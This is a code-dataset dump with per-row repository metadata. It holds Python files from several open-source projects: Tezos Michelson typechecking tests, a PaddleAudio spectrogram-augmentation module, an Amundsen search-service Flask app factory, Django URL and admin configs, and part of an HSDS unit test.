        key3 = client.show_address('sk3').public_key
        # Three public keys of the three different signature schemes, ordered
        client.typecheck_data(
            '{"' + key1 + '"; "' + key2 + '"; "' + key3 + '"}', '(set key)'
        )
        # Test all orderings that do not respect the comparable order
        utils.assert_typecheck_data_failure(
            client,
            '{"' + key1 + '"; "' + key3 + '"; "' + key2 + '"}',
            '(set key)',
        )
        utils.assert_typecheck_data_failure(
            client,
            '{"' + key2 + '"; "' + key1 + '"; "' + key3 + '"}',
            '(set key)',
        )
        utils.assert_typecheck_data_failure(
            client,
            '{"' + key2 + '"; "' + key3 + '"; "' + key1 + '"}',
            '(set key)',
        )
        utils.assert_typecheck_data_failure(
            client,
            '{"' + key3 + '"; "' + key1 + '"; "' + key2 + '"}',
            '(set key)',
        )
        utils.assert_typecheck_data_failure(
            client,
            '{"' + key3 + '"; "' + key2 + '"; "' + key1 + '"}',
            '(set key)',
        )
@pytest.mark.contract
class TestTypecheckingErrors:
    """Checks the wording of specific typechecking error messages."""

    def test_big_map_arity_error(self, client: Client):
        """EMPTY_BIG_MAP with one argument reports an arity error."""
        script = os.path.join(CONTRACT_PATH, 'ill_typed', 'big_map_arity.tz')
        expected = (
            'primitive EMPTY_BIG_MAP expects 2 arguments but is given 1.'
        )
        with utils.assert_run_failure(expected):
            client.typecheck(script)
# Michelson script that UNPACKs its bytes parameter as a lambda; used by
# TestBadAnnotation to feed it bytes whose embedded annotation is not
# valid UTF-8 (UNPACK should then yield None rather than fail).
BAD_ANNOT_TEST = '''
parameter bytes;
storage (option (lambda unit unit));
code { CAR; UNPACK (lambda unit unit); NIL operation; PAIR}
'''
@pytest.mark.contract
class TestBadAnnotation:
    """UNPACK of a value carrying an invalid UTF-8 annotation must yield None."""

    def test_write_contract_bad_annot(self, tmpdir, session: dict):
        """Write the BAD_ANNOT_TEST contract to a temp file and record its path."""
        name = 'bad_annot.tz'
        contract = f'{tmpdir}/{name}'
        script = BAD_ANNOT_TEST
        with open(contract, 'w') as contract_file:
            contract_file.write(script)
        # Share the file path with the next test through the session fixture.
        session[name] = contract

    def test_bad_annotation(self, client: Client, session: dict):
        """Run the contract on a payload whose annotation is invalid UTF-8."""
        name = 'bad_annot.tz'
        contract = session[name]
        # This was produced by running "tezos-client hash data '{ UNIT
        # ; PAIR ; CAR %faa }' of type 'lambda unit unit'" and
        # replacing the two last bytes (that correspond to the two
        # 'a's at the end of the annotation) by the 0xff byte which is
        # not a valid UTF8-encoding of a string
        parameter = '0x05020000000e034f03420416000000042566ffff'
        res = client.run_script(contract, 'None', parameter)
        # UNPACK must fail gracefully, leaving the storage at None.
        assert res.storage == 'None'
@pytest.mark.contract
class TestOrderInTopLevelDoesNotMatter:
    """The typechecker must accept any ordering of top-level script sections."""

    @pytest.fixture
    def contract_splitted_in_top_level_elements(self):
        """The three top-level sections of a minimal contract, as strings."""
        sections = [
            "parameter nat",
            "storage unit",
            "code { CDR; NIL operation; PAIR }",
        ]
        return sections

    def test_shuffle(
        self, client: Client, contract_splitted_in_top_level_elements
    ):
        """Typecheck every permutation of the top-level sections."""
        orderings = itertools.permutations(
            contract_splitted_in_top_level_elements
        )
        for ordering in orderings:
            source = ";\n".join(ordering)
            client.typecheck(source, file=False)
@pytest.mark.contract
@pytest.mark.regression
class TestSelfAddressTransfer:
    """Scenario: a sender contract passes its SELF address to a receiver."""

    def test_self_address_originate_sender(
        self, client_regtest_scrubbed, session
    ):
        """Originate the self_address_sender contract with 0 tez."""
        client = client_regtest_scrubbed
        path = os.path.join(
            CONTRACT_PATH, 'mini_scenarios', 'self_address_sender.tz'
        )
        originate(client, session, path, 'Unit', 0)

    def test_self_address_originate_receiver(
        self, client_regtest_scrubbed, session
    ):
        """Originate the receiver contract and remember its address."""
        client = client_regtest_scrubbed
        path = os.path.join(
            CONTRACT_PATH, 'mini_scenarios', 'self_address_receiver.tz'
        )
        originate(client, session, path, 'Unit', 0)
        # originate() stores the new contract's address under 'contract';
        # stash it for the transfer test below.
        session['receiver_address'] = session['contract']

    def test_send_self_address(self, client_regtest_scrubbed, session):
        """Call the sender with the receiver's address and bake the block."""
        client = client_regtest_scrubbed
        receiver_address = session['receiver_address']
        client.transfer(
            0,
            'bootstrap2',
            'self_address_sender',
            ['--arg', f'"{receiver_address}"', '--burn-cap', '2'],
        )
        utils.bake(client, 'bootstrap5')
@pytest.mark.slow
@pytest.mark.contract
@pytest.mark.regression
class TestScriptHashRegression:
    """Regression-record the script hash of every test contract."""

    @pytest.mark.parametrize("contract", all_contracts())
    def test_contract_hash(self, client_regtest: Client, contract):
        """Hash one contract file; the regtest fixture records the output."""
        client = client_regtest
        assert contract.endswith(
            '.tz'
        ), "test contract should have .tz extension"
        client.hash_script(os.path.join(CONTRACT_PATH, contract))
@pytest.mark.contract
class TestScriptHashOrigination:
    """Offline script hashing must agree with the hash of an originated contract."""

    def test_contract_hash_with_origination(
        self, client: Client, session: dict
    ):
        """Originate a trivial contract, then compare both hash sources."""
        source = 'parameter unit; storage unit; code {CAR; NIL operation; PAIR}'
        originate(
            client,
            session,
            contract=source,
            init_storage='Unit',
            amount=1000,
            contract_name='dummy_contract',
        )
        # Hash computed locally from the source text.
        offline_hash = client.hash_script(source)
        # Hash reported by the node for the originated contract.
        node_hash = client.get_script_hash('dummy_contract')
        assert offline_hash == node_hash
@pytest.mark.contract
@pytest.mark.regression
class TestNormalize:
    """Regression tests for the `normalize data/script/type` client commands."""

    # All supported unparsing modes; None lets the client pick its default.
    modes = [None, 'Readable', 'Optimized', 'Optimized_legacy']

    @pytest.mark.parametrize('mode', modes)
    def test_normalize_unparsing_mode(self, client_regtest_scrubbed, mode):
        """Normalize the same comb-pair data under each unparsing mode."""
        client = client_regtest_scrubbed
        input_data = (
            '{Pair 0 3 6 9; Pair 1 (Pair 4 (Pair 7 10)); {2; 5; 8; 11}}'
        )
        input_type = 'list (pair nat nat nat nat)'
        client.normalize(input_data, input_type, mode=mode)

    def test_normalize_legacy_flag(self, client_regtest_scrubbed):
        """The annotation `%a` is accepted only when the legacy flag is set."""
        client = client_regtest_scrubbed
        input_data = '{Elt %a 0 1}'
        input_type = 'map nat nat'
        client.normalize(input_data, input_type, legacy=True)
        error_pattern = 'unexpected annotation.'
        with utils.assert_run_failure(error_pattern):
            client.normalize(input_data, input_type, legacy=False)

    @pytest.mark.parametrize('mode', modes)
    def test_normalize_script(self, client_regtest_scrubbed, mode):
        """Normalize a whole script under each unparsing mode."""
        client = client_regtest_scrubbed
        path = os.path.join(CONTRACT_PATH, 'opcodes', 'comb-literals.tz')
        client.normalize_script(path, mode=mode)

    # Types with increasing comb-pair nesting, exercised by the type test.
    types = [
        'nat',
        'list nat',
        'pair nat int',
        'list (pair nat int)',
        'pair nat int bool',
        'list (pair nat int bool)',
        'pair nat int bool bytes',
        'list (pair nat int bool bytes)',
    ]

    @pytest.mark.parametrize('typ', types)
    def test_normalize_type(self, client_regtest_scrubbed, typ):
        """Normalize each type expression; regtest records the output."""
        client = client_regtest_scrubbed
        client.normalize_type(typ)
| true | true |
f71044d972aeda32c49abd7d7f83422f3a1eb8f0 | 5,359 | py | Python | PaddleAudio/paddleaudio/features/augment.py | AshburnLee/models | 98fa58030f8ce352b3818f43897ac719ccffdffc | [
"Apache-2.0"
] | 1 | 2022-02-13T08:33:52.000Z | 2022-02-13T08:33:52.000Z | PaddleAudio/paddleaudio/features/augment.py | AshburnLee/models | 98fa58030f8ce352b3818f43897ac719ccffdffc | [
"Apache-2.0"
] | null | null | null | PaddleAudio/paddleaudio/features/augment.py | AshburnLee/models | 98fa58030f8ce352b3818f43897ac719ccffdffc | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Iterable, List, Optional, Tuple, TypeVar
import numpy as np
from numpy import ndarray as array
from paddleaudio.backends import depth_convert
from paddleaudio.utils import ParameterError
__all__ = [
'depth_augment',
'spect_augment',
'random_crop1d',
'random_crop2d',
'adaptive_spect_augment',
]
def randint(high: int) -> int:
    """Draw one random integer uniformly from the range [0, high).

    Helper for the random data-augmentation routines in this module.
    """
    sample = np.random.randint(0, high=high)
    return int(sample)
def rand() -> float:
    """Draw one floating-point number uniformly from [0, 1).

    Helper for the random data-augmentation routines in this module.
    """
    sample = np.random.rand(1)
    return float(sample)
def depth_augment(y: array,
                  choices: List = ['int8', 'int16'],
                  probs: List[float] = [0.5, 0.5]) -> array:
    """Audio depth augmentation.

    Simulates quantization distortion by converting the signal to a randomly
    chosen lower bit depth and back to its original dtype.

    :param y: input audio array.
    :param choices: candidate dtypes to round-trip through.
    :param probs: selection probability for each entry of ``choices``
        (must have the same length).
    :return: array with the same dtype as ``y`` after the depth round-trip.

    NOTE(review): ``choices`` and ``probs`` are mutable default arguments;
    safe only as long as callers never mutate them — consider None-defaults.
    """
    assert len(probs) == len(
        choices
    ), 'number of choices {} must be equal to size of probs {}'.format(
        len(choices), len(probs))
    # Pick one target depth according to the given probabilities.
    depth = np.random.choice(choices, p=probs)
    src_depth = y.dtype
    # Round-trip: down-convert then restore the original dtype.
    y1 = depth_convert(y, depth)
    y2 = depth_convert(y1, src_depth)
    return y2
def adaptive_spect_augment(spect: array,
                           tempo_axis: int = 0,
                           level: float = 0.1) -> array:
    """Do adaptive spectrogram augmentation (SpecAugment-style masking).

    The strength of the augmentation is governed by ``level``, ranging from
    0 to 1, with 0 representing no augmentation: mask widths are
    ``level * 0.5`` of each dimension and the number of masks is
    ``int(10 * level)`` per axis.

    NOTE: ``spect`` is modified in place (masked regions zeroed) and also
    returned.

    :param spect: 2-d spectrogram array.
    :param tempo_axis: which axis (0 or 1) is the time axis.
    :param level: augmentation strength in [0, 1].
    """
    assert spect.ndim == 2., 'only supports 2d tensor or numpy array'
    # Resolve (time, freq) extents according to the time-axis position.
    if tempo_axis == 0:
        nt, nf = spect.shape
    else:
        nf, nt = spect.shape
    time_mask_width = int(nt * level * 0.5)
    freq_mask_width = int(nf * level * 0.5)
    num_time_mask = int(10 * level)
    num_freq_mask = int(10 * level)
    # Zero out randomly placed time stripes and frequency stripes; the two
    # branches differ only in which axis is sliced first.
    if tempo_axis == 0:
        for _ in range(num_time_mask):
            start = randint(nt - time_mask_width)
            spect[start:start + time_mask_width, :] = 0
        for _ in range(num_freq_mask):
            start = randint(nf - freq_mask_width)
            spect[:, start:start + freq_mask_width] = 0
    else:
        for _ in range(num_time_mask):
            start = randint(nt - time_mask_width)
            spect[:, start:start + time_mask_width] = 0
        for _ in range(num_freq_mask):
            start = randint(nf - freq_mask_width)
            spect[start:start + freq_mask_width, :] = 0
    return spect
def spect_augment(spect: array,
                  tempo_axis: int = 0,
                  max_time_mask: int = 3,
                  max_freq_mask: int = 3,
                  max_time_mask_width: int = 30,
                  max_freq_mask_width: int = 20) -> array:
    """Do spectrogram augmentation in both time and freq axes.

    Randomly draws the number of masks and a single mask width per axis
    (each uniform in [0, max)), then zeroes that many randomly placed
    stripes along each axis.

    NOTE: ``spect`` is modified in place and also returned.
    NOTE(review): one width is sampled and reused for *all* masks on an
    axis, rather than per mask — presumably intentional, but worth
    confirming against the SpecAugment reference.

    :param spect: 2-d spectrogram array.
    :param tempo_axis: which axis (0 or 1) is the time axis.
    :param max_time_mask: exclusive upper bound on the number of time masks.
    :param max_freq_mask: exclusive upper bound on the number of freq masks.
    :param max_time_mask_width: exclusive upper bound on time-mask width.
    :param max_freq_mask_width: exclusive upper bound on freq-mask width.
    """
    assert spect.ndim == 2., 'only supports 2d tensor or numpy array'
    if tempo_axis == 0:
        nt, nf = spect.shape
    else:
        nf, nt = spect.shape
    # Draw mask counts and (shared) widths for this call.
    num_time_mask = randint(max_time_mask)
    num_freq_mask = randint(max_freq_mask)
    time_mask_width = randint(max_time_mask_width)
    freq_mask_width = randint(max_freq_mask_width)
    # Zero out the stripes; branches differ only in which axis is time.
    if tempo_axis == 0:
        for _ in range(num_time_mask):
            start = randint(nt - time_mask_width)
            spect[start:start + time_mask_width, :] = 0
        for _ in range(num_freq_mask):
            start = randint(nf - freq_mask_width)
            spect[:, start:start + freq_mask_width] = 0
    else:
        for _ in range(num_time_mask):
            start = randint(nt - time_mask_width)
            spect[:, start:start + time_mask_width] = 0
        for _ in range(num_freq_mask):
            start = randint(nf - freq_mask_width)
            spect[start:start + freq_mask_width, :] = 0
    return spect
def random_crop1d(y: array, crop_len: int) -> array:
    """Do random cropping on a 1d input signal.

    The input is a 1d signal, typically a sound waveform.

    :param y: 1-d array to crop.
    :param crop_len: length of the crop; must not exceed ``len(y)``.
    :return: a contiguous random slice of ``y`` of length ``crop_len``.
    :raises ParameterError: if ``y`` is not one-dimensional.
    """
    if y.ndim != 1:
        # The original body was a bare string literal here (a no-op), so the
        # check never had any effect; raise explicitly, mirroring
        # random_crop2d's error handling.
        raise ParameterError('only accept 1d tensor or numpy array')
    n = len(y)
    idx = randint(n - crop_len)
    return y[idx:idx + crop_len]
def random_crop2d(s: array, crop_len: int, tempo_axis: int = 0) -> array:
    """Do random cropping for a 2D array, typically a spectrogram.

    The cropping is done along the temporal axis of the time-freq input.

    :param s: input array.
    :param crop_len: length of the crop along ``tempo_axis``.
    :param tempo_axis: axis along which to crop.
    :raises ParameterError: if ``tempo_axis`` is out of range for ``s``.
    """
    if tempo_axis >= s.ndim:
        raise ParameterError('axis out of range')
    span = s.shape[tempo_axis]
    start = randint(high=span - crop_len)
    # Select everything on every axis except the temporal one.
    selector = [slice(None)] * s.ndim
    selector[tempo_axis] = slice(start, start + crop_len)
    return s[tuple(selector)]
| 31.156977 | 83 | 0.631274 |
from typing import Iterable, List, Optional, Tuple, TypeVar
import numpy as np
from numpy import ndarray as array
from paddleaudio.backends import depth_convert
from paddleaudio.utils import ParameterError
__all__ = [
'depth_augment',
'spect_augment',
'random_crop1d',
'random_crop2d',
'adaptive_spect_augment',
]
def randint(high: int) -> int:
return int(np.random.randint(0, high=high))
def rand() -> float:
return float(np.random.rand(1))
def depth_augment(y: array,
choices: List = ['int8', 'int16'],
probs: List[float] = [0.5, 0.5]) -> array:
assert len(probs) == len(
choices
), 'number of choices {} must be equal to size of probs {}'.format(
len(choices), len(probs))
depth = np.random.choice(choices, p=probs)
src_depth = y.dtype
y1 = depth_convert(y, depth)
y2 = depth_convert(y1, src_depth)
return y2
def adaptive_spect_augment(spect: array,
tempo_axis: int = 0,
level: float = 0.1) -> array:
assert spect.ndim == 2., 'only supports 2d tensor or numpy array'
if tempo_axis == 0:
nt, nf = spect.shape
else:
nf, nt = spect.shape
time_mask_width = int(nt * level * 0.5)
freq_mask_width = int(nf * level * 0.5)
num_time_mask = int(10 * level)
num_freq_mask = int(10 * level)
if tempo_axis == 0:
for _ in range(num_time_mask):
start = randint(nt - time_mask_width)
spect[start:start + time_mask_width, :] = 0
for _ in range(num_freq_mask):
start = randint(nf - freq_mask_width)
spect[:, start:start + freq_mask_width] = 0
else:
for _ in range(num_time_mask):
start = randint(nt - time_mask_width)
spect[:, start:start + time_mask_width] = 0
for _ in range(num_freq_mask):
start = randint(nf - freq_mask_width)
spect[start:start + freq_mask_width, :] = 0
return spect
def spect_augment(spect: array,
tempo_axis: int = 0,
max_time_mask: int = 3,
max_freq_mask: int = 3,
max_time_mask_width: int = 30,
max_freq_mask_width: int = 20) -> array:
assert spect.ndim == 2., 'only supports 2d tensor or numpy array'
if tempo_axis == 0:
nt, nf = spect.shape
else:
nf, nt = spect.shape
num_time_mask = randint(max_time_mask)
num_freq_mask = randint(max_freq_mask)
time_mask_width = randint(max_time_mask_width)
freq_mask_width = randint(max_freq_mask_width)
if tempo_axis == 0:
for _ in range(num_time_mask):
start = randint(nt - time_mask_width)
spect[start:start + time_mask_width, :] = 0
for _ in range(num_freq_mask):
start = randint(nf - freq_mask_width)
spect[:, start:start + freq_mask_width] = 0
else:
for _ in range(num_time_mask):
start = randint(nt - time_mask_width)
spect[:, start:start + time_mask_width] = 0
for _ in range(num_freq_mask):
start = randint(nf - freq_mask_width)
spect[start:start + freq_mask_width, :] = 0
return spect
def random_crop1d(y: array, crop_len: int) -> array:
    """Do random cropping on a 1d input signal.

    :raises ParameterError: if ``y`` is not one-dimensional.
    """
    if y.ndim != 1:
        # Comment-stripping left this `if` with an empty body (a syntax
        # error); raise explicitly, mirroring random_crop2d.
        raise ParameterError('only accept 1d tensor or numpy array')
    n = len(y)
    idx = randint(n - crop_len)
    return y[idx:idx + crop_len]
def random_crop2d(s: array, crop_len: int, tempo_axis: int = 0) -> array:
if tempo_axis >= s.ndim:
raise ParameterError('axis out of range')
n = s.shape[tempo_axis]
idx = randint(high=n - crop_len)
sli = [slice(None) for i in range(s.ndim)]
sli[tempo_axis] = slice(idx, idx + crop_len)
out = s[tuple(sli)]
return out
| true | true |
f71045928932e18081469a28d0e1d162f32eb006 | 4,059 | py | Python | search_service/__init__.py | lukelowery/amundsensearchlibrary | cdaf1e3b75edd55bee8b0c65178863e25b0a479a | [
"Apache-2.0"
] | null | null | null | search_service/__init__.py | lukelowery/amundsensearchlibrary | cdaf1e3b75edd55bee8b0c65178863e25b0a479a | [
"Apache-2.0"
] | null | null | null | search_service/__init__.py | lukelowery/amundsensearchlibrary | cdaf1e3b75edd55bee8b0c65178863e25b0a479a | [
"Apache-2.0"
] | null | null | null | import ast
import importlib
import os
import logging
import logging.config
import sys
from flask import Flask, Blueprint
from flask_restful import Api
from flask_cors import CORS
from typing import Dict, Any # noqa: F401
from flasgger import Swagger
from search_service.api.dashboard import SearchDashboardAPI
from search_service.api.table import SearchTableAPI, SearchTableFilterAPI
from search_service.api.user import SearchUserAPI
from search_service.api.document import DocumentUserAPI, DocumentTableAPI, DocumentTablesAPI, DocumentUsersAPI
from search_service.api.healthcheck import healthcheck
# For customized flask use below arguments to override.
FLASK_APP_MODULE_NAME = os.getenv('FLASK_APP_MODULE_NAME')
FLASK_APP_CLASS_NAME = os.getenv('FLASK_APP_CLASS_NAME')
FLASK_APP_KWARGS_DICT_STR = os.getenv('FLASK_APP_KWARGS_DICT')
ROOT_DIR = os.path.dirname(os.path.abspath(__file__))
# Environment Variable to enable cors
CORS_ENABLED = os.environ.get('CORS_ENABLED', False)
def create_app(*, config_module_class: str) -> Flask:
    """
    Creates app in function so that flask with flask extensions can be
    initialized with specific config. Here it defines the route of APIs
    so that it can be seen in one place where implementation is separated.

    Config is being fetched via module.class name where module.class name
    can be passed through environment variable.
    This is to make config fetched through runtime PYTHON_PATH so that
    Config class can be easily injected.
    More on: http://flask.pocoo.org/docs/1.0/config/

    :param config_module_class: name of the config
    :return: Flask
    """
    # Optionally instantiate a custom Flask subclass named via env vars,
    # with kwargs supplied as a Python-literal dict string.
    if FLASK_APP_MODULE_NAME and FLASK_APP_CLASS_NAME:
        print(f'Using requested Flask module {FLASK_APP_MODULE_NAME} '
              f'and class {FLASK_APP_CLASS_NAME}', file=sys.stderr)
        class_obj = getattr(
            importlib.import_module(FLASK_APP_MODULE_NAME),
            FLASK_APP_CLASS_NAME
        )
        flask_kwargs_dict = {}  # type: Dict[str, Any]
        if FLASK_APP_KWARGS_DICT_STR:
            print(f'Using kwargs {FLASK_APP_KWARGS_DICT_STR} to instantiate Flask',
                  file=sys.stderr)
            # literal_eval (not eval) safely parses the dict literal.
            flask_kwargs_dict = ast.literal_eval(FLASK_APP_KWARGS_DICT_STR)
        app = class_obj(__name__, **flask_kwargs_dict)
    else:
        app = Flask(__name__)
    if CORS_ENABLED:
        CORS(app)
    # Environment variable overrides the config class passed by the caller.
    config_module_class = \
        os.getenv('SEARCH_SVC_CONFIG_MODULE_CLASS') or config_module_class
    app.config.from_object(config_module_class)
    # Configure logging from a file if provided, else from config values.
    if app.config.get('LOG_CONFIG_FILE'):
        logging.config.fileConfig(app.config.get('LOG_CONFIG_FILE'), disable_existing_loggers=False)
    else:
        logging.basicConfig(format=app.config.get('LOG_FORMAT'), datefmt=app.config.get('LOG_DATE_FORMAT'))
        logging.getLogger().setLevel(app.config.get('LOG_LEVEL'))
    # NOTE(review): these two lines log nearly identical messages
    # back-to-back; one is likely redundant.
    logging.info('Creating app with config name {}'
                 .format(config_module_class))
    logging.info('Created app with config name {}'.format(config_module_class))
    api_bp = Blueprint('api', __name__)
    api_bp.add_url_rule('/healthcheck', 'healthcheck', healthcheck)
    api = Api(api_bp)
    # Table Search API
    # TODO: Rename endpoint to be more generic and accept a resource type so that logic can be re-used
    api.add_resource(SearchTableFilterAPI, '/search_table')
    api.add_resource(SearchTableAPI, '/search')
    # User Search API
    api.add_resource(SearchUserAPI, '/search_user')
    # Dashboard Search API
    api.add_resource(SearchDashboardAPI, '/search_dashboard')
    # DocumentAPI
    api.add_resource(DocumentTablesAPI, '/document_table')
    api.add_resource(DocumentTableAPI, '/document_table/<document_id>')
    api.add_resource(DocumentUsersAPI, '/document_user')
    api.add_resource(DocumentUserAPI, '/document_user/<document_id>')
    app.register_blueprint(api_bp)
    # Expose Swagger UI only when explicitly enabled in config.
    if app.config.get('SWAGGER_ENABLED'):
        Swagger(app, template_file=os.path.join(ROOT_DIR, app.config.get('SWAGGER_TEMPLATE_PATH')), parse=True)
    return app
| 38.292453 | 111 | 0.74033 | import ast
import importlib
import os
import logging
import logging.config
import sys
from flask import Flask, Blueprint
from flask_restful import Api
from flask_cors import CORS
from typing import Dict, Any
from flasgger import Swagger
from search_service.api.dashboard import SearchDashboardAPI
from search_service.api.table import SearchTableAPI, SearchTableFilterAPI
from search_service.api.user import SearchUserAPI
from search_service.api.document import DocumentUserAPI, DocumentTableAPI, DocumentTablesAPI, DocumentUsersAPI
from search_service.api.healthcheck import healthcheck
FLASK_APP_MODULE_NAME = os.getenv('FLASK_APP_MODULE_NAME')
FLASK_APP_CLASS_NAME = os.getenv('FLASK_APP_CLASS_NAME')
FLASK_APP_KWARGS_DICT_STR = os.getenv('FLASK_APP_KWARGS_DICT')
ROOT_DIR = os.path.dirname(os.path.abspath(__file__))
CORS_ENABLED = os.environ.get('CORS_ENABLED', False)
def create_app(*, config_module_class: str) -> Flask:
if FLASK_APP_MODULE_NAME and FLASK_APP_CLASS_NAME:
print(f'Using requested Flask module {FLASK_APP_MODULE_NAME} '
f'and class {FLASK_APP_CLASS_NAME}', file=sys.stderr)
class_obj = getattr(
importlib.import_module(FLASK_APP_MODULE_NAME),
FLASK_APP_CLASS_NAME
)
flask_kwargs_dict = {}
if FLASK_APP_KWARGS_DICT_STR:
print(f'Using kwargs {FLASK_APP_KWARGS_DICT_STR} to instantiate Flask',
file=sys.stderr)
flask_kwargs_dict = ast.literal_eval(FLASK_APP_KWARGS_DICT_STR)
app = class_obj(__name__, **flask_kwargs_dict)
else:
app = Flask(__name__)
if CORS_ENABLED:
CORS(app)
config_module_class = \
os.getenv('SEARCH_SVC_CONFIG_MODULE_CLASS') or config_module_class
app.config.from_object(config_module_class)
if app.config.get('LOG_CONFIG_FILE'):
logging.config.fileConfig(app.config.get('LOG_CONFIG_FILE'), disable_existing_loggers=False)
else:
logging.basicConfig(format=app.config.get('LOG_FORMAT'), datefmt=app.config.get('LOG_DATE_FORMAT'))
logging.getLogger().setLevel(app.config.get('LOG_LEVEL'))
logging.info('Creating app with config name {}'
.format(config_module_class))
logging.info('Created app with config name {}'.format(config_module_class))
api_bp = Blueprint('api', __name__)
api_bp.add_url_rule('/healthcheck', 'healthcheck', healthcheck)
api = Api(api_bp)
api.add_resource(SearchTableFilterAPI, '/search_table')
api.add_resource(SearchTableAPI, '/search')
api.add_resource(SearchUserAPI, '/search_user')
api.add_resource(SearchDashboardAPI, '/search_dashboard')
api.add_resource(DocumentTablesAPI, '/document_table')
api.add_resource(DocumentTableAPI, '/document_table/<document_id>')
api.add_resource(DocumentUsersAPI, '/document_user')
api.add_resource(DocumentUserAPI, '/document_user/<document_id>')
app.register_blueprint(api_bp)
if app.config.get('SWAGGER_ENABLED'):
Swagger(app, template_file=os.path.join(ROOT_DIR, app.config.get('SWAGGER_TEMPLATE_PATH')), parse=True)
return app
| true | true |
f7104645b4e560e005f0f55e7673f10e687b7f5e | 828 | py | Python | Sample REST API/SampleProject/urls.py | tanvipenumudy/Cookiecutter_Django_REST-API | f6604d7798ecebf0c432cdf141c24b0c2d85fdf2 | [
"MIT"
] | null | null | null | Sample REST API/SampleProject/urls.py | tanvipenumudy/Cookiecutter_Django_REST-API | f6604d7798ecebf0c432cdf141c24b0c2d85fdf2 | [
"MIT"
] | null | null | null | Sample REST API/SampleProject/urls.py | tanvipenumudy/Cookiecutter_Django_REST-API | f6604d7798ecebf0c432cdf141c24b0c2d85fdf2 | [
"MIT"
] | null | null | null | """SampleProject URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from MyApp import views
# URL routes for the project: the Django admin site and the ideal-weight
# API endpoint served by MyApp.views.IdealWeight.
urlpatterns = [
    url(r'^admin/', admin.site.urls),
    url(r'^idealweight/',views.IdealWeight)
]
| 34.5 | 77 | 0.713768 | from django.conf.urls import url
from django.contrib import admin
from MyApp import views
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^idealweight/',views.IdealWeight)
]
| true | true |
f71046c1dc5db319fb44c820336093811da73c30 | 931 | py | Python | algorithm_web/admin/problem.py | KMU-algolab/algorithm | 2b734978da78b936244580ed1febe4f9f6cf1aea | [
"MIT"
] | null | null | null | algorithm_web/admin/problem.py | KMU-algolab/algorithm | 2b734978da78b936244580ed1febe4f9f6cf1aea | [
"MIT"
] | 10 | 2019-03-15T05:12:23.000Z | 2020-05-06T13:05:49.000Z | algorithm_web/admin/problem.py | KMU-algolab/algorithm | 2b734978da78b936244580ed1febe4f9f6cf1aea | [
"MIT"
] | null | null | null | from django.contrib import admin
from .. import models
@admin.register(models.Problem)
class ProblemeAdmin(admin.ModelAdmin):
    """
    Problem management (admin page for Problem records).
    """
    # NOTE(review): class name has a typo ("Probleme"); left unchanged to
    # avoid breaking any external references.
    list_display = ['problem_name', 'limit_time', 'limit_memory', 'scoring_type', 'level', 'info', 'is_open', 'checker_code']
    class Meta:
        model = models.Problem
@admin.register(models.ProblemSet)
class ProblemSetAdmin(admin.ModelAdmin):
    """
    Problem-set management (admin page for ProblemSet records).
    """
    list_display = ['set_name', 'editor', 'message']
    class Meta:
        model = models.ProblemSet
@admin.register(models.ProblemList)
class ProblemListAdmin(admin.ModelAdmin):
    """
    Management of problems within a problem set (ProblemList records).
    """
    list_display = ['problem_set', 'problem']
    class Meta:
        model = models.ProblemList
@admin.register(models.TestCase)
class TestCaseAdmin(admin.ModelAdmin):
    """
    Test-case management (admin page for TestCase records).
    """
    list_display = ['id', 'problem']
    class Meta:
        model = models.TestCase
from .. import models
@admin.register(models.Problem)
class ProblemeAdmin(admin.ModelAdmin):
list_display = ['problem_name', 'limit_time', 'limit_memory', 'scoring_type', 'level', 'info', 'is_open', 'checker_code']
class Meta:
model = models.Problem
@admin.register(models.ProblemSet)
class ProblemSetAdmin(admin.ModelAdmin):
list_display = ['set_name', 'editor', 'message']
class Meta:
model = models.ProblemSet
@admin.register(models.ProblemList)
class ProblemListAdmin(admin.ModelAdmin):
list_display = ['problem_set', 'problem']
class Meta:
model = models.ProblemList
@admin.register(models.TestCase)
class TestCaseAdmin(admin.ModelAdmin):
list_display = ['id', 'problem']
class Meta:
model = models.TestCase | true | true |
f710474b36d3e20f8e9a1f23e934f85fb7128046 | 6,277 | py | Python | tests/unit/dsetUtilTest.py | murlock/hsds | 9f5fc3cdb64017d07e34eb422eee5398553d213c | [
"Apache-2.0"
] | null | null | null | tests/unit/dsetUtilTest.py | murlock/hsds | 9f5fc3cdb64017d07e34eb422eee5398553d213c | [
"Apache-2.0"
] | null | null | null | tests/unit/dsetUtilTest.py | murlock/hsds | 9f5fc3cdb64017d07e34eb422eee5398553d213c | [
"Apache-2.0"
] | null | null | null | ##############################################################################
# Copyright by The HDF Group. #
# All rights reserved. #
# #
# This file is part of HSDS (HDF5 Scalable Data Service), Libraries and #
# Utilities. The full HSDS copyright notice, including #
# terms governing use, modification, and redistribution, is contained in #
# the file COPYING, which can be found at the root of the source code #
# distribution tree. If you do not have access to this file, you may #
# request a copy from help@hdfgroup.org. #
##############################################################################
import unittest
import sys
sys.path.append('../../hsds/util')
sys.path.append('../../hsds')
from dsetUtil import getHyperslabSelection, getSelectionShape
from dsetUtil import ItemIterator, getEvalStr
class DsetUtilTest(unittest.TestCase):
    """Unit tests for the dsetUtil selection/query helpers."""

    def __init__(self, *args, **kwargs):
        super(DsetUtilTest, self).__init__(*args, **kwargs)
        # main

    def testGetHyperslabSelection(self):
        """Check slice tuples for default/partial start, stop, step args."""
        # getHyperslabSelection(dsetshape, start, stop, step)
        # 1-D case
        datashape = [100,]
        slices = getHyperslabSelection(datashape)
        self.assertEqual(len(slices), 1)
        self.assertEqual(slices[0], slice(0, 100, 1))
        slices = getHyperslabSelection(datashape, 20)
        self.assertEqual(len(slices), 1)
        self.assertEqual(slices[0], slice(20, 100, 1))
